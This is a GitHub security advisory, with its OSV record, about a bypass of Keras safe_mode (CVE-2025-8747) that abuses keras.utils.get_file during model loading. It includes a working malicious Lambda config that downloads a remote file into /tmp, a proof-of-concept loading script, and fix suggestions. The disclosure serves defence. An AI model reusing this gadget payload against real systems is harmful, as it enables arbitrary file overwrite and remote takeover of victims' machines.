GHSA-c9rc-mg46-23w3
Vulnerability from GitHub
Published: 2025-08-12 19:33
Modified: 2025-08-12 19:33
Summary: Keras vulnerable to CVE-2025-1550 bypass via reuse of internal functionality
Details

Summary

It is possible to bypass the mitigation introduced in response to CVE-2025-1550, when an untrusted Keras v3 model is loaded, even when “safe_mode” is enabled, by crafting malicious arguments to built-in Keras modules.

The vulnerability is exploitable on the default configuration and does not depend on user input (just requires an untrusted model to be loaded).

Impact

| Type | Vector | Impact |
| -------- | ------- | ------- |
| Unsafe deserialization | Client-side (when loading an untrusted model) | Arbitrary file overwrite. Can lead to arbitrary code execution in many cases. |

Details

Keras’ safe_mode flag is designed to disallow unsafe lambda deserialization - specifically by rejecting any arbitrary embedded Python code, marked by the “__lambda__” class name. https://github.com/keras-team/keras/blob/v3.8.0/keras/src/saving/serialization_lib.py#L641 -

```
if config["class_name"] == "__lambda__":
    if safe_mode:
        raise ValueError(
            "Requested the deserialization of a `lambda` object. "
            "This carries a potential risk of arbitrary code execution "
            "and thus it is disallowed by default. If you trust the "
            "source of the saved model, you can pass `safe_mode=False` to "
            "the loading function in order to allow `lambda` loading, "
            "or call `keras.config.enable_unsafe_deserialization()`."
        )
```
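
For reference, this is the behavior the bypass sidesteps: with safe_mode left at its default of True, loading a model whose config embeds arbitrary Python code as a “__lambda__” object is rejected with the ValueError above. A minimal sketch, assuming a hypothetical file lambda_model.keras that contains such a payload -

```
from keras.models import load_model

try:
    # safe_mode=True is the default; shown explicitly for clarity
    model = load_model("lambda_model.keras", safe_mode=True)
except ValueError as err:
    print(err)  # "Requested the deserialization of a `lambda` object. ..."
```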

A fix to the vulnerability, allowing deserialization of the object only from internal Keras modules, was introduced in the commit bb340d6780fdd6e115f2f4f78d8dbe374971c930.

```
package = module.split(".", maxsplit=1)[0]
if package in {"keras", "keras_hub", "keras_cv", "keras_nlp"}:
```
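
Because this check only inspects the top-level package name, any callable living under one of the four approved packages passes it, including keras.utils.get_file. A short sketch of the check applied to the attacker-supplied module string (illustrative only, not the exact surrounding code from serialization_lib.py) -

```
# Module string taken from the attacker-controlled config (see the Example below)
module = "keras.utils"

# The allowlist from the fix only looks at the top-level package
package = module.split(".", maxsplit=1)[0]                          # -> "keras"
print(package in {"keras", "keras_hub", "keras_cv", "keras_nlp"})   # True, so deserialization proceeds
```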

However, it is still possible to exploit model loading, for example by reusing the internal Keras function keras.utils.get_file to download remote files to an attacker-controlled location. This allows arbitrary file overwrite, which in many cases can also lead to remote code execution. For example, an attacker could download a malicious authorized_keys file into the user’s SSH folder, giving the attacker full SSH access to the victim’s machine. Since the model does not contain arbitrary Python code, this scenario is not blocked by “safe_mode”, and it bypasses the latest fix because it uses a function from one of the approved modules (keras).

Example

The following truncated config.json will cause a remote file download from https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js to the local /tmp folder, by sending arbitrary arguments to Keras’ built-in function keras.utils.get_file() -

{ "class_name": "Lambda", "config": { "arguments": { "origin": "https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js", "cache_dir":"/tmp", "cache_subdir":"", "force_download": true}, "function": { "class_name": "function", "config": "get_file", "module": "keras.utils" } },

PoC

  1. Download malicious_model_download.keras to a local directory

  2. Load the model -

```
from keras.models import load_model

model = load_model("malicious_model_download.keras", safe_mode=True)
```

  3. Observe that a new file index.js was created in the /tmp directory (a quick check is sketched below)
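
A quick way to confirm the side effect from step 3 (a sketch; the path follows from the cache_dir and filename used in the config above) -

```
import os

# Expected to print True once the malicious model has been loaded
print(os.path.isfile("/tmp/index.js"))
```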

Fix suggestions

  1. Add an additional flag block_all_lambda that allows users to completely disallow loading models with a Lambda layer.
  2. Audit the keras, keras_hub, keras_cv, keras_nlp modules and remove/block all “gadget functions” which could be used by malicious ML models.
  3. Add an additional flag lambda_whitelist_functions that allows users to specify a list of functions that are allowed to be invoked by a Lambda layer (a sketch of such a check follows below).
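
As an illustration of suggestion 3, a minimal sketch of what such a check could look like. Note that block_all_lambda and lambda_whitelist_functions do not currently exist in Keras; the flag, function, and set names below are hypothetical -

```
# Hypothetical allowlist check for Lambda-layer functions (names are illustrative,
# not part of the Keras API)
ALLOWED_LAMBDA_FUNCTIONS = {"keras.activations.relu"}  # user-configured whitelist

def check_lambda_function(module, name, allowed=ALLOWED_LAMBDA_FUNCTIONS):
    """Refuse to deserialize a Lambda layer whose function is not whitelisted."""
    qualified = f"{module}.{name}"
    if qualified not in allowed:
        raise ValueError(
            f"Function {qualified!r} is not listed in lambda_whitelist_functions; "
            "refusing to deserialize this Lambda layer."
        )

# With the malicious config from the Example above, this would raise:
# check_lambda_function("keras.utils", "get_file")
```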

Credit

The vulnerability was discovered by Andrey Polkovnichenko of the JFrog Vulnerability Research team.

OSV record as published on the source website:


{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "keras"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-8747"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-12T19:33:07Z",
    "nvd_published_at": null,
    "severity": "HIGH"
  },
  "details": "### Summary\nIt is possible to bypass the mitigation introduced in response to [CVE-2025-1550](https://github.com/keras-team/keras/security/advisories/GHSA-48g7-3x6r-xfhp), when an untrusted Keras v3 model is loaded, even when \u201csafe_mode\u201d is enabled, by crafting malicious arguments to built-in Keras modules.\n\nThe vulnerability is exploitable on the default configuration and does not depend on user input (just requires an untrusted model to be loaded).\n\n### Impact\n\n| Type   | Vector   |Impact|\n| -------- | ------- | ------- |\n|Unsafe deserialization |Client-Side (when loading untrusted model)|Arbitrary file overwrite. Can lead to Arbitrary code execution in many cases.|\n\n\n### Details\n\nKeras\u2019 [safe_mode](https://www.tensorflow.org/api_docs/python/tf/keras/models/load_model) flag is designed to disallow unsafe lambda deserialization - specifically by rejecting any arbitrary embedded Python code, marked by the \u201c__lambda__\u201d class name.\nhttps://github.com/keras-team/keras/blob/v3.8.0/keras/src/saving/serialization_lib.py#L641 -\n\n```\nif config[\"class_name\"] == \"__lambda__\":\n        if safe_mode:\n            raise ValueError(\n                \"Requested the deserialization of a `lambda` object. \"\n                \"This carries a potential risk of arbitrary code execution \"\n                \"and thus it is disallowed by default. If you trust the \"\n                \"source of the saved model, you can pass `safe_mode=False` to \"\n                \"the loading function in order to allow `lambda` loading, \"\n                \"or call `keras.config.enable_unsafe_deserialization()`.\"\n            )\n```\n\nA fix to the vulnerability, allowing deserialization of the object only from internal Keras modules, was introduced in the commit [bb340d6780fdd6e115f2f4f78d8dbe374971c930](https://github.com/keras-team/keras/commit/bb340d6780fdd6e115f2f4f78d8dbe374971c930). \n\n```\npackage = module.split(\".\", maxsplit=1)[0]\nif package in {\"keras\", \"keras_hub\", \"keras_cv\", \"keras_nlp\"}:\n```\n\nHowever, it is still possible to exploit model loading, for example by reusing the internal Keras function `keras.utils.get_file`, and download remote files to an attacker-controlled location.\nThis allows for arbitrary file overwrite which in many cases could also lead to remote code execution. For example, an attacker would be able to download a malicious `authorized_keys` file into the user\u2019s SSH folder, giving the attacker full SSH access to the victim\u2019s machine.\nSince the model does not contain arbitrary Python code, this scenario will not be blocked by \u201csafe_mode\u201d. 
It will bypass the latest fix since it uses a function from one of the approved modules (`keras`).\n\n#### Example \nThe following truncated `config.json` will cause a remote file download from https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js to the local `/tmp` folder, by sending arbitrary arguments to Keras\u2019 builtin function `keras.utils.get_file()` -\n\n```\n           {\n                \"class_name\": \"Lambda\",\n                \"config\": {\n                    \"arguments\": {\n                        \"origin\": \"https://raw.githubusercontent.com/andr3colonel/when_you_watch_computer/refs/heads/master/index.js\",\n                        \"cache_dir\":\"/tmp\",\n                        \"cache_subdir\":\"\",\n                        \"force_download\": true},\n                    \"function\": {\n                        \"class_name\": \"function\",\n                        \"config\": \"get_file\",\n                        \"module\": \"keras.utils\"\n                    }\n                },\n ```\n\n\n### PoC\n\n1. Download [malicious_model_download.keras](https://drive.google.com/file/d/1gS2I6VTTRUwUq8gBoMmvTGaN0SX1Vr8F/view?usp=drive_link) to a local directory\n\n2. Load the model -\n\n```\nfrom keras.models import load_model\nmodel = load_model(\"malicious_model_download.keras\", safe_mode=True)\n```\n\n3. Observe that a new file `index.js` was created in the `/tmp` directory \n\n### Fix suggestions\n1. Add an additional flag `block_all_lambda` that allows users to completely disallow loading models with a Lambda layer.\n1. Audit the `keras`, `keras_hub`, `keras_cv`, `keras_nlp` modules and remove/block all \u201cgadget functions\u201d which could be used by malicious ML models.\n1. Add an additional flag `lambda_whitelist_functions` that allows users to specify a list of functions that are allowed to be invoked by a Lambda layer\n\n### Credit \nThe vulnerability was discovered by Andrey Polkovnichenko of the JFrog Vulnerability Research",
  "id": "GHSA-c9rc-mg46-23w3",
  "modified": "2025-08-12T19:33:07Z",
  "published": "2025-08-12T19:33:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/security/advisories/GHSA-c9rc-mg46-23w3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8747"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/pull/21429"
    },
    {
      "type": "WEB",
      "url": "https://github.com/keras-team/keras/commit/713172ab56b864e59e2aa79b1a51b0e728bba858"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/keras-team/keras"
    },
    {
      "type": "WEB",
      "url": "https://jfrog.com/blog/keras-safe_mode-bypass-vulnerability"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Keras vulnerable to CVE-2025-1550 bypass via reuse of internal functionality"
}

